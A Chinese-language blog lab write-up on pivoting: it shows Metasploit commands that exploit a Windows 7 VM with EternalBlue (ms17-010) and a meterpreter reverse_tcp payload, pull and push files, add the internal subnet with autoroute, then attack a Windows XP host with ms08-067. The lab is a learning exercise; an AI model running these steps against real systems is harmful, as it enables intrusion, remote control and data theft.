跨网段攻击
文章目錄
- 1、實(shí)驗(yàn)內(nèi)容
- 2、實(shí)驗(yàn)準(zhǔn)備
- 3、滲透攻擊環(huán)節(jié)
- 3.1kali通過永恒之藍(lán)ms17-010攻擊win7
- 3.2 shell模塊進(jìn)行遠(yuǎn)程登錄
- 4、跨網(wǎng)段攻擊 kali——>winxp
1、實(shí)驗(yàn)內(nèi)容
??????模擬使用kali作為攻擊機(jī)通過外網(wǎng)滲透win7,并把win7作為跳板,攻擊內(nèi)網(wǎng)中的winxp
2、實(shí)驗(yàn)準(zhǔn)備
靶機(jī):win7(雙網(wǎng)卡):192.168.44.164(NAT)+10.10.10.129(僅主機(jī)模式)
? ?????????winxpsp3:10.10.10.128(僅主機(jī)模式)
攻擊機(jī):kali:192.168.44.165(NAT)
實(shí)驗(yàn)開始前,需要配置所需的環(huán)境:
?????1.這里kali使用NAT模式,作為外網(wǎng)的攻擊機(jī),通過ifconfig獲取IP地址。
?????2. 配置內(nèi)網(wǎng):在VM虛擬機(jī)中新建一個(gè)虛擬網(wǎng)段Vmnet2,并設(shè)置為僅主機(jī)模式:
win7虛擬機(jī)作為kali的攻擊跳板,需要設(shè)置兩個(gè)虛擬網(wǎng)卡,其中一個(gè)設(shè)置為剛剛設(shè)置為僅主機(jī)模式:
然后將目標(biāo)機(jī)winxp也設(shè)置在同一網(wǎng)段:
這里實(shí)驗(yàn)所需要的環(huán)境就算配置完成了。
3、滲透攻擊環(huán)節(jié)
這個(gè)實(shí)驗(yàn)的重點(diǎn)是跨網(wǎng)段攻擊,所以就前面的滲透攻擊win7不做過多的演示:
3.1kali通過永恒之藍(lán)ms17-010攻擊win7
● search ms17-010 //通過nmap掃描到445端口,搜索ms17-010這個(gè)漏洞相關(guān)的腳本
● use 0 //使用攻擊腳本 //kali系統(tǒng)里面在/usr/share/metasploit-framework/modules/目錄下能看具體載荷的代碼,后邊根據(jù)具體腳本而定
● set rhost ip地址 // 設(shè)置目標(biāo)的IP地址、我們需要攻擊的地址
● set lhost ip地址 //kali的IP地址
● set payload windows/x64/meterpreter/reverse_tcp // 設(shè)置基于TCP反向連接的攻擊載荷
● run //執(zhí)行攻擊
可以看到我們已經(jīng)攻擊成功了。這里可以使用一些命令:
1、screenshot(獲取屏幕快照)
2、上傳文件到Windows主機(jī):upload /root/csb666.jpg c://csb666.jpg
3、從Windows主機(jī)中下載文件到kali中:download d:/meishaonv.jpg /root
3.2 shell模塊進(jìn)行遠(yuǎn)程登錄
首先我們可以查看它的IP:
如果查看的結(jié)果是亂碼,輸入chcp 65001就可以顯示正常。我們可以發(fā)現(xiàn),win7這臺(tái)機(jī)器有兩個(gè)網(wǎng)卡,發(fā)現(xiàn)還有一個(gè)10.10.10.x的網(wǎng)段,那我們可以查看是否存在其他ip:
arp -a參數(shù)的含義就是通過詢問當(dāng)前協(xié)議數(shù)據(jù),顯示當(dāng)前 ARP 項(xiàng)。如果指定 inet_addr,則只顯示指定計(jì)算機(jī)的 IP 地址和物理地址。如果不止一個(gè)網(wǎng)絡(luò)接口使用 ARP,則顯示每個(gè) ARP 表的項(xiàng)。可以在命令窗口輸入arp /?查看具體說明。
我們可以看到在內(nèi)網(wǎng)中還有一個(gè)ip,這個(gè)就是要攻擊的winxp,通過win7給攻擊機(jī)kali分配一個(gè)網(wǎng)段(將內(nèi)網(wǎng)段添加到路由):
查看路由映射情況:run autoroute -p
這個(gè)時(shí)候已經(jīng)實(shí)現(xiàn)了給kali分配一個(gè)ip,使得kali可以和winxp進(jìn)行連接。然后就可以對(duì)winxp進(jìn)行滲透攻擊。
4、跨網(wǎng)段攻擊 kali——>winxp
使用ms08-067對(duì)winxp進(jìn)行攻擊,同kali攻擊win7一樣:
這里需要注意的是payload只能正向連接,因?yàn)閣inxp是ping不同kali,而kali能ping同winxp。整個(gè)跨網(wǎng)段攻擊就是這樣,這里面通過kali對(duì)win7和winxp都挺容易,只需要用已發(fā)現(xiàn)的漏洞進(jìn)行滲透測(cè)試,主要是將內(nèi)網(wǎng)段添加至路由表對(duì)于小白來說很陌生。這個(gè)實(shí)驗(yàn)主要分享學(xué)習(xí)心得,體會(huì)攻擊的過程所以不會(huì)涉及太多NB的操作。
總結(jié)
- 上一篇: 游戏策划的excel配置表转成json文
- 下一篇: lucene的建立索引,搜索,中文分词